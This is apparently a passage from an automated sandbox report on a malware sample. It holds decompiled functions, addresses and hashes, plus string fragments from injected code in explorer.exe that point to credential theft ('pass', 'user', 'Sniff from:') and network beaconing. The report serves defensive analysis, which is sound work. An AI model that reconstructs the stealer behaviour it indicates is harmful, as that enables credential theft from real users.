				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t48;
				intOrPtr _t49;
				intOrPtr _t50;
				intOrPtr* _t52;
				char _t56;
				void* _t69;
				char _t72;
				void* _t73;
				intOrPtr _t75;
				intOrPtr _t79;
				void* _t82;
				void* _t84;
				intOrPtr _t86;
				void* _t88;
				signed int _t90;
				signed int _t92;
				signed int _t93;

				_t80 = __edx;
				_t92 = (_t90 & 0xfffffff8) - 0x4c;
				_v8 =  *0x1e49d360 ^ _t92;
				_t72 = 0;
				_v72 = __edx;
				_t82 = __ecx;
				_t86 =  *((intOrPtr*)(__edx + 0xc8));
				_v68 = _t86;
				E1E3EFA60( &_v60, 0, 0x30);
				_t48 =  *((intOrPtr*)(_t82 + 0x70));
				_t93 = _t92 + 0xc;
				_v76 = _t48;
				_t49 = _t48;
				if(_t49 == 0) {
					_push(5);
					 *((char*)(_t82 + 0x6a)) = 0;
					 *((intOrPtr*)(_t82 + 0x6c)) = 0;
					goto L3;
				} else {
					_t69 = _t49 - 1;
					if(_t69 != 0) {
						if(_t69 == 1) {
							_push(0xa);
							goto L3;
						} else {
							_t56 = 0;
						}
					} else {
						_push(4);
						L3:
						_pop(_t50);
						_v80 = _t50;
						if(_a4 == _t72 && _t86 != 0 && _t50 != 0xa &&  *((char*)(_t82 + 0x6b)) == 1) {
							E1E3C2280(_t50, _t86 + 0x1c);
							_t79 = _v72;
							 *((intOrPtr*)(_t79 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
							 *((intOrPtr*)(_t79 + 0x88)) =  *((intOrPtr*)(_t82 + 0x68));
							 *((intOrPtr*)(_t79 + 0x8c)) =  *((intOrPtr*)(_t82 + 0x6c));
							 *((intOrPtr*)(_t79 + 0x90)) = _v80;
							 *((intOrPtr*)(_t79 + 0x20)) = _t72;
							E1E3BFFB0(_t72, _t82, _t86 + 0x1c);
						}
						_t75 = _v80;
						_t52 =  *((intOrPtr*)(_v72 + 0x20));
						_t80 =  *_t52;
						_v72 =  *((intOrPtr*)(_t52 + 4));
						_v52 =  *((intOrPtr*)(_t82 + 0x68));
						_v60 = 0x30;
						_v56 = _t75;
						_v48 =  *((intOrPtr*)(_t82 + 0x6c));
						asm("movsd");
						_v76 = _t80;
						_v64 = 0x30;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						if(_t80 != 0) {
							 *0x1e49b1e0(_t75, _v72,  &_v64,  &_v60);
							_t72 = _v76();
						}
						_t56 = _t72;
					}
				}
				_pop(_t84);
				_pop(_t88);
				_pop(_t73);
				return E1E3EB640(_t56, _t73, _v8 ^ _t93, _t80, _t84, _t88);
			}


































                                  0x1e3d645b
                                  0x1e3d6463
                                  0x1e3d646d
                                  0x1e3d6475
                                  0x1e3d647a
                                  0x1e3d647e
                                  0x1e3d6480
                                  0x1e3d648c
                                  0x1e3d6490
                                  0x1e3d6495
                                  0x1e3d6498
                                  0x1e3d649b
                                  0x1e3d649f
                                  0x1e3d64a1
                                  0x1e417c07
                                  0x1e417c09
                                  0x1e417c0c
                                  0x00000000
                                  0x1e3d64a7
                                  0x1e3d64a7
                                  0x1e3d64aa
                                  0x1e417bf7
                                  0x1e417c00
                                  0x00000000
                                  0x1e417bf9
                                  0x1e417bf9
                                  0x1e417bf9
                                  0x1e3d64b0
                                  0x1e3d64b0
                                  0x1e3d64b2
                                  0x1e3d64b2
                                  0x1e3d64b3
                                  0x1e3d64ba
                                  0x1e3d6553
                                  0x1e3d655e
                                  0x1e3d6566
                                  0x1e3d656c
                                  0x1e3d6575
                                  0x1e3d657f
                                  0x1e3d6585
                                  0x1e3d6588
                                  0x1e3d6588
                                  0x1e3d64c7
                                  0x1e3d64cb
                                  0x1e3d64ce
                                  0x1e3d64d3
                                  0x1e3d64da
                                  0x1e3d64e5
                                  0x1e3d64ed
                                  0x1e3d64f1
                                  0x1e3d64f5
                                  0x1e3d64f6
                                  0x1e3d64fa
                                  0x1e3d6502
                                  0x1e3d6503
                                  0x1e3d6504
                                  0x1e3d6507
                                  0x1e3d651a
                                  0x1e3d6524
                                  0x1e3d6524
                                  0x1e3d6526
                                  0x1e3d6526
                                  0x1e3d64aa
                                  0x1e3d652c
                                  0x1e3d652d
                                  0x1e3d652e
                                  0x1e3d6539

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.373307377.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                  • Associated: 0000000B.00000002.373418274.000000001E49B000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000B.00000002.373424599.000000001E49F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: 0$0
                                  • API String ID: 3446177414-203156872
                                  • Opcode ID: 20bc853a84277132374955895b7c341da4cc5cafe673f5ac046e4063079f8400
                                  • Instruction ID: c6ce05866ed0a428c24516c3888f241f737f9b2715814094d67d7a417fdcff41
                                  • Opcode Fuzzy Hash: 20bc853a84277132374955895b7c341da4cc5cafe673f5ac046e4063079f8400
                                  • Instruction Fuzzy Hash: 52415BB26047469FC301CF28C484A1ABBE5BB8D714F454A6EF899DB301D731EA49CB96
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00082322, Relevance: 5.3, Strings: 4, Instructions: 315COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.368689957.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: 0$AWAV$Ic$VWUS
                                  • API String ID: 0-661394024
                                  • Opcode ID: c2eee98a4414dc011e95a67bd2f23515dd289af076a230c065391e938dbfd885
                                  • Instruction ID: 9e748987122ead4dc58edc6335c80f334f7c68bdd10f1cf53d25ac8aa6ce15e3
                                  • Opcode Fuzzy Hash: c2eee98a4414dc011e95a67bd2f23515dd289af076a230c065391e938dbfd885
                                  • Instruction Fuzzy Hash: 14A1B2704087488FDB64EF98D4456EEB7E4FF94304F10061EE8DAD7252EBB4D9458B86
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1E43FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 53%
                                  			E1E43FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E1E3ECE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E1E435720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E1E435720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                  0x1e43fdda
                                  0x1e43fde2
                                  0x1e43fde5
                                  0x1e43fdec
                                  0x1e43fdfa
                                  0x1e43fdff
                                  0x1e43fe0a
                                  0x1e43fe0f
                                  0x1e43fe17
                                  0x1e43fe1e
                                  0x1e43fe19
                                  0x1e43fe19
                                  0x1e43fe19
                                  0x1e43fe20
                                  0x1e43fe21
                                  0x1e43fe22
                                  0x1e43fe25
                                  0x1e43fe40

                                  APIs
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1E43FDFA
                                  Strings
                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 1E43FE2B
                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 1E43FE01
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.373307377.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                  • Associated: 0000000B.00000002.373418274.000000001E49B000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000B.00000002.373424599.000000001E49F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                  • API String ID: 885266447-3903918235
                                  • Opcode ID: 8c4dd5c18a6f453816f1360b50a81c1f370b25123c3af78329026e1c4b690587
                                  • Instruction ID: d0965ee7a8980bc73e418a959f569537691f8a2ee80af317fb6936aed78332d2
                                  • Opcode Fuzzy Hash: 8c4dd5c18a6f453816f1360b50a81c1f370b25123c3af78329026e1c4b690587
                                  • Instruction Fuzzy Hash: 22F0F636500551BFDB200A45EC02F63BB5AEB88731F250316F668566E1DB62F86096F0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00081422, Relevance: 5.1, Strings: 4, Instructions: 143COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.368689957.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: .dll$el32$h$kern
                                  • API String ID: 0-4264704552
                                  • Opcode ID: ae282cd6d486f701958709f62c854dae402e44c06a0a478616d5972fc3258da0
                                  • Instruction ID: 8aa6d92d7d99cf8f939bee66ddb8aab0253f05775dd929573ff9723aed7227c2
                                  • Opcode Fuzzy Hash: ae282cd6d486f701958709f62c854dae402e44c06a0a478616d5972fc3258da0
                                  • Instruction Fuzzy Hash: FC416270608B498FD7A8EF69C4843EAB7E5FF98300F544A2E949EC3256DB70C945CB81
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00083FA5, Relevance: 5.1, Strings: 4, Instructions: 113COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.368689957.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: .dll$chro$hild$me_c
                                  • API String ID: 0-3136806129
                                  • Opcode ID: 81d19808bcf00e6cbc1c6c2dce2e44becfa2d8c9eef35f40c44b73c03c9e7801
                                  • Instruction ID: 421803cb6f67b26763df0ee67609cdc97a189533e3711955d820f1ab7d4c060e
                                  • Opcode Fuzzy Hash: 81d19808bcf00e6cbc1c6c2dce2e44becfa2d8c9eef35f40c44b73c03c9e7801
                                  • Instruction Fuzzy Hash: B4318F30118A488FCB84FF688495BAAB7E1FF94300F94466DA48ACB256DF30D945C756
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000878F9, Relevance: 5.1, Strings: 4, Instructions: 109COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.368689957.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: $Snif$f fr$om:
                                  • API String ID: 0-3434893486
                                  • Opcode ID: 49a2d39a1f7fc53a328d03b08b28b8fb9b416af87dfffea4b9a3cb4d68bc9db9
                                  • Instruction ID: 05717c09b4bed42fb4227ab8ebbabf55201868a44f60999c95f90bfd597dc44c
                                  • Opcode Fuzzy Hash: 49a2d39a1f7fc53a328d03b08b28b8fb9b416af87dfffea4b9a3cb4d68bc9db9
                                  • Instruction Fuzzy Hash: 70319E31518B489FD719EB28C485ADAB7E4FB94300F50491EE4DBC7652EE30AA4ACB43
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00087902, Relevance: 5.1, Strings: 4, Instructions: 109COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.368689957.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: $Snif$f fr$om:
                                  • API String ID: 0-3434893486
                                  • Opcode ID: d70b49d62e4495a68a78dc5cc3bb9accdbcdae455e3531e59aee493e38930d30
                                  • Instruction ID: bb18abcd400d1b19f20d23f7ee57912faced3380858d119e254c52483e68de01
                                  • Opcode Fuzzy Hash: d70b49d62e4495a68a78dc5cc3bb9accdbcdae455e3531e59aee493e38930d30
                                  • Instruction Fuzzy Hash: 6C31AF71518B485FD719EB28C485AEAB7E4FB94300F50491EE4DBC7256EE30EA49CB43
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00083FB2, Relevance: 5.1, Strings: 4, Instructions: 106COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.368689957.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: .dll$chro$hild$me_c
                                  • API String ID: 0-3136806129
                                  • Opcode ID: 3d33631aee1d0a7c566559c7c4113288574d0372d2b061282ffad0d568a1a718
                                  • Instruction ID: 33cc13785055a7a846f3d66c95d0254052c0076e3f24acb1cbec8cd90a17818a
                                  • Opcode Fuzzy Hash: 3d33631aee1d0a7c566559c7c4113288574d0372d2b061282ffad0d568a1a718
                                  • Instruction Fuzzy Hash: F8318270118B488FCB84FF689495BAAB7E1FF94300F94466DA48ECB256DF30D944CB96
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000868B2, Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.368689957.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                  • API String ID: 0-319646191
                                  • Opcode ID: 8600fe1419c86ee04e4d9b50d85689d97b2880a0dd53235f66170289e1fbba16
                                  • Instruction ID: 1b1a7de3b499bc4a1ebef82e9080475e3e8e5662822d26cc35766be13ce33de7
                                  • Opcode Fuzzy Hash: 8600fe1419c86ee04e4d9b50d85689d97b2880a0dd53235f66170289e1fbba16
                                  • Instruction Fuzzy Hash: 2D319F31614A0C8ADF44FFA8C8857EDB7F1FB58315F40422AE48ED7241DF7496498795
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000868AE, Relevance: 5.1, Strings: 4, Instructions: 92COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.368689957.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                  • API String ID: 0-319646191
                                  • Opcode ID: befc87dc6b55f4520f845e078035f468974c8004e2339b336586b6b91dd7de07
                                  • Instruction ID: 77587e3919e7a6fcbd14ac36c21bf9da875992a3bbadc4257060877ee2421b41
                                  • Opcode Fuzzy Hash: befc87dc6b55f4520f845e078035f468974c8004e2339b336586b6b91dd7de07
                                  • Instruction Fuzzy Hash: 2021DD30610A0C8ACF44FFA8C8857EDBBF1FF68305F40422AE48AE7242DF7496498795
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00087832, Relevance: 5.1, Strings: 4, Instructions: 77COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.368689957.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: auth$logi$pass$user
                                  • API String ID: 0-2393853802
                                  • Opcode ID: 4fa7be0676df68f2d1b7c80f8f839babdcf969bdc99cffb02524ee6c014d4097
                                  • Instruction ID: 4bfce4ca6afb8b39c8f2a433d2a0c04531e27e24905ae6a1c0707b7186f8973a
                                  • Opcode Fuzzy Hash: 4fa7be0676df68f2d1b7c80f8f839babdcf969bdc99cffb02524ee6c014d4097
                                  • Instruction Fuzzy Hash: 31219D3061470D8BCB45EF9998816EEBBF1FF88344F014619A84AEB245EAB4D914CBC2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0008654A, Relevance: 5.1, Strings: 4, Instructions: 64COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.368689957.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: -Age$H$User$nt:
                                  • API String ID: 0-1844531148
                                  • Opcode ID: da13ddc7ef056d3fc01d8973de82151a16319e260bacc5f0c03b9e34ca5daa9c
                                  • Instruction ID: 6113b96290ec9b6c9998ee89b6154de2dddb292a884e16e7bf100761e167951f
                                  • Opcode Fuzzy Hash: da13ddc7ef056d3fc01d8973de82151a16319e260bacc5f0c03b9e34ca5daa9c
                                  • Instruction Fuzzy Hash: 4711CE70509A488FD784EF18C449B69FBE0FB69304F16059DD899CB222D775D9418B82
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Analysis Process: explorer.exe PID: 3472 Parent PID: 6252 explorer.exeCOMMON

                                  Executed Functions

                                  Function 06758782, Relevance: 20.1, APIs: 1, Strings: 10, Instructions: 814COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.515412026.00000000066A0000.00000040.00000001.sdmp, Offset: 066A0000, based on PE: false
                                  Similarity
                                  • API ID: getaddrinfo
                                  • String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
                                  • API String ID: 300660673-1117930895
                                  • Opcode ID: 0648fb3a1b3169a28be7094cd426224deaf617277f2c30b26ba9640e8e035f5f
                                  • Instruction ID: 95566689a17d715a82fb61b10957849bfed6a4b762be7ed5052ec52c48b3e204
                                  • Opcode Fuzzy Hash: 0648fb3a1b3169a28be7094cd426224deaf617277f2c30b26ba9640e8e035f5f
                                  • Instruction Fuzzy Hash: 8A52B430618B488FC7A9EF68D4847E9B7E1FB44300F51496EC9AFC7142EEB0A545CB92
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 06754F52, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.515412026.00000000066A0000.00000040.00000001.sdmp, Offset: 066A0000, based on PE: false
                                  Similarity
                                  • API ID: connect
                                  • String ID: conn$ect
                                  • API String ID: 1959786783-716201944
                                  • Opcode ID: bdbe5afaba5d73808d09b5cee695c3c1d891866feefc15c756c93ae076febf5d
                                  • Instruction ID: 65628a9f7a5f7423cc4663a2d2fec6309b351261d4a73f91013e0e019482401b
                                  • Opcode Fuzzy Hash: bdbe5afaba5d73808d09b5cee695c3c1d891866feefc15c756c93ae076febf5d
                                  • Instruction Fuzzy Hash: 1D012170618A0C8FCBC4EF5CE448B5477E0EB59314F1641AE990DCB266CAB4C9818BC2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 06754F4F, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.515412026.00000000066A0000.00000040.00000001.sdmp, Offset: 066A0000, based on PE: false
                                  Similarity
                                  • API ID: connect
                                  • String ID: conn$ect
                                  • API String ID: 1959786783-716201944
                                  • Opcode ID: 2d355b9345ca705121897348be71a861751b67a308a01a927678aed3faaae977
                                  • Instruction ID: 09779f110e16fa8dc9f021ab435563d9fc4d04cf99a16afdd05950b8b5a5abcf
                                  • Opcode Fuzzy Hash: 2d355b9345ca705121897348be71a861751b67a308a01a927678aed3faaae977
                                  • Instruction Fuzzy Hash: 61015E70918A088FCB84EF4CE488B54B7E0EB58311F1641AE980DDB26ACAB4C9818BC1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 06754DD2, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.515412026.00000000066A0000.00000040.00000001.sdmp, Offset: 066A0000, based on PE: false
                                  Similarity
                                  • API ID: socket
                                  • String ID: sock
                                  • API String ID: 98920635-2415254727
                                  • Opcode ID: a658dfbb0002886f02ed33fbb6ceae53b06ff0d6187248b9ed792d08595e28ac
                                  • Instruction ID: b8b77e00996d72de2fe7344fda1271b030eb8f62829671034c1b8cfef558326d
                                  • Opcode Fuzzy Hash: a658dfbb0002886f02ed33fbb6ceae53b06ff0d6187248b9ed792d08595e28ac
                                  • Instruction Fuzzy Hash: 7E0121706186188FCB84EF1CD048B54BBE0FB59314F1545ADD85DCB266D7B0C9818B86
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 06754DD0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.515412026.00000000066A0000.00000040.00000001.sdmp, Offset: 066A0000, based on PE: false
                                  Similarity
                                  • API ID: socket
                                  • String ID: sock
                                  • API String ID: 98920635-2415254727
                                  • Opcode ID: 10f9494dcd697002e96d8ef7d64bde6d86902f1b0e2736b1f316aa032c1e4241
                                  • Instruction ID: fb8242b31b39ea9f1951e5fe3fc1e3eb59b9be126329bf3d9ecacfc8c5a2ff7d
                                  • Opcode Fuzzy Hash: 10f9494dcd697002e96d8ef7d64bde6d86902f1b0e2736b1f316aa032c1e4241
                                  • Instruction Fuzzy Hash: F2017C30618A088FCB84EF1CD448B54BBE0FB59314F1A45ADD85ECB226D7B0C9818B86
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0674D2C9, Relevance: 1.6, APIs: 1, Instructions: 89COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.515412026.00000000066A0000.00000040.00000001.sdmp, Offset: 066A0000, based on PE: false
                                  Similarity
                                  • API ID: Sleep
                                  • String ID:
                                  • API String ID: 3472027048-0
                                  • Opcode ID: 6bb13f69f888b39ab92230b0e49ad81c518a2e564a985a8a781243bfdaa19091
                                  • Instruction ID: eca63d94748a1874b74aa43957aed453487c68466b5bb72f526caf56ec56cba0
                                  • Opcode Fuzzy Hash: 6bb13f69f888b39ab92230b0e49ad81c518a2e564a985a8a781243bfdaa19091
                                  • Instruction Fuzzy Hash: 00311674A04B09DBDBA4AF69848C3A9B7A1FF44300F14466E89AD8B206CB74A550CFD1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions

                                  Analysis Process: cmd.exe PID: 6656 Parent PID: 3472 cmd.exeCOMMON

                                  Executed Functions

                                  Function 02F39DA2, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 79filenativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtCreateFile.0000000E.00000002.501948723.0000000003090000.00000040.00000001.(00000060,00000000,.z`,02F34B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02F34B87,007A002E,00000000,00000060,00000000,00000000), ref: 02F39D9D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.501858309.0000000002F20000.00000040.00000001.sdmp, Offset: 02F20000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: CreateE.00000002.501948723.0000000003090000.00000040.00000001File.0000000
                                  • String ID: .z`
                                  • API String ID: 848707494-1441809116
                                  • Opcode ID: 9f2ab27b33effec840eb792f28155610fe2182a9cf151cd6bc44a0bafc8bcb58
                                  • Instruction ID: 5a2e4e05d6f9d359c83673ff7f933645ff2fd398d90d30d0d5fb137f78ca755a
                                  • Opcode Fuzzy Hash: 9f2ab27b33effec840eb792f28155610fe2182a9cf151cd6bc44a0bafc8bcb58
                                  • Instruction Fuzzy Hash: 7821E9B2200108AFCB08CF99DC95EEB77ADEF8C754F158248FA5DA7240D630E811CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02F39D50, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtCreateFile.0000000E.00000002.501948723.0000000003090000.00000040.00000001.(00000060,00000000,.z`,02F34B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02F34B87,007A002E,00000000,00000060,00000000,00000000), ref: 02F39D9D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.501858309.0000000002F20000.00000040.00000001.sdmp, Offset: 02F20000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: CreateE.00000002.501948723.0000000003090000.00000040.00000001File.0000000
                                  • String ID: .z`
                                  • API String ID: 848707494-1441809116
                                  • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                  • Instruction ID: 50802b93642b9f2dbd54be4c53825b346c085b130b9cbd660ded479a9293c754
                                  • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                  • Instruction Fuzzy Hash: BDF0B2B2201208AFCB08CF89DC95EEB77ADAF8C754F158248BA1D97240C630E8118BA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02F39E7D, Relevance: 1.5, APIs: 1, Instructions: 42nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtClose.0000000E.00000002.501948723.0000000003090000.00000040.00000001.(02F34D20,?,?,02F34D20,00000000,FFFFFFFF), ref: 02F39EA5
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.501858309.0000000002F20000.00000040.00000001.sdmp, Offset: 02F20000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: Close.0000000E.00000002.501948723.0000000003090000.00000040.00000001
                                  • String ID:
                                  • API String ID: 2697246500-0
                                  • Opcode ID: 5d0532116e8a2029fdc6b3384f05a2603bb7b2703ce871e3b9c027219efb2936
                                  • Instruction ID: 7c5c695c4713ee3f6ba5f7f2c56dfe72c83c3cc1cee5f203df0b6af660d06d05
                                  • Opcode Fuzzy Hash: 5d0532116e8a2029fdc6b3384f05a2603bb7b2703ce871e3b9c027219efb2936
                                  • Instruction Fuzzy Hash: FDF049B6600204AFDB14EF98DC85EEB77ADEF88350F068459BA5DA7201C630F9108BE0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02F39E00, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtReadFile.0000000E.00000002.501948723.0000000003090000.00000040.00000001.(02F34D42,5EB6522D,FFFFFFFF,02F34A01,?,?,02F34D42,?,02F34A01,FFFFFFFF,5EB6522D,02F34D42,?,00000000), ref: 02F39E45
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.501858309.0000000002F20000.00000040.00000001.sdmp, Offset: 02F20000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: E.00000002.501948723.0000000003090000.00000040.00000001File.0000000Read
                                  • String ID:
                                  • API String ID: 4114687261-0
                                  • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                  • Instruction ID: 8725a49b6a5c4f9f07f2eaa0380285e88b9d6effcce004e47fddeaf7db9fcdb7
                                  • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                  • Instruction Fuzzy Hash: CDF0BDB2200108AFCB14DF89DC91DEB77ADEF8C754F158248BE5D97241D630E811CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02F39E7B, Relevance: 1.5, APIs: 1, Instructions: 33filenativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtReadFile.0000000E.00000002.501948723.0000000003090000.00000040.00000001.(02F34D42,5EB6522D,FFFFFFFF,02F34A01,?,?,02F34D42,?,02F34A01,FFFFFFFF,5EB6522D,02F34D42,?,00000000), ref: 02F39E45
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.501858309.0000000002F20000.00000040.00000001.sdmp, Offset: 02F20000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: E.00000002.501948723.0000000003090000.00000040.00000001File.0000000Read
                                  • String ID:
                                  • API String ID: 4114687261-0
                                  • Opcode ID: c9f3e30a47a7d2c6ca6d9b9cce00fa409f56cbb037da157f0b4daa529d398437
                                  • Instruction ID: a3ab612330632fe026379aa7c1d7152d73d1e7263ee9ad9661272eaf23ed4564
                                  • Opcode Fuzzy Hash: c9f3e30a47a7d2c6ca6d9b9cce00fa409f56cbb037da157f0b4daa529d398437
                                  • Instruction Fuzzy Hash: 9CF03AB2200048ABCB04DF99DC90CEB77ADAF8C354B058649FE5C93201C630E855CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02F39E80, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtClose.0000000E.00000002.501948723.0000000003090000.00000040.00000001.(02F34D20,?,?,02F34D20,00000000,FFFFFFFF), ref: 02F39EA5
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.501858309.0000000002F20000.00000040.00000001.sdmp, Offset: 02F20000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: Close.0000000E.00000002.501948723.0000000003090000.00000040.00000001
                                  • String ID:
                                  • API String ID: 2697246500-0
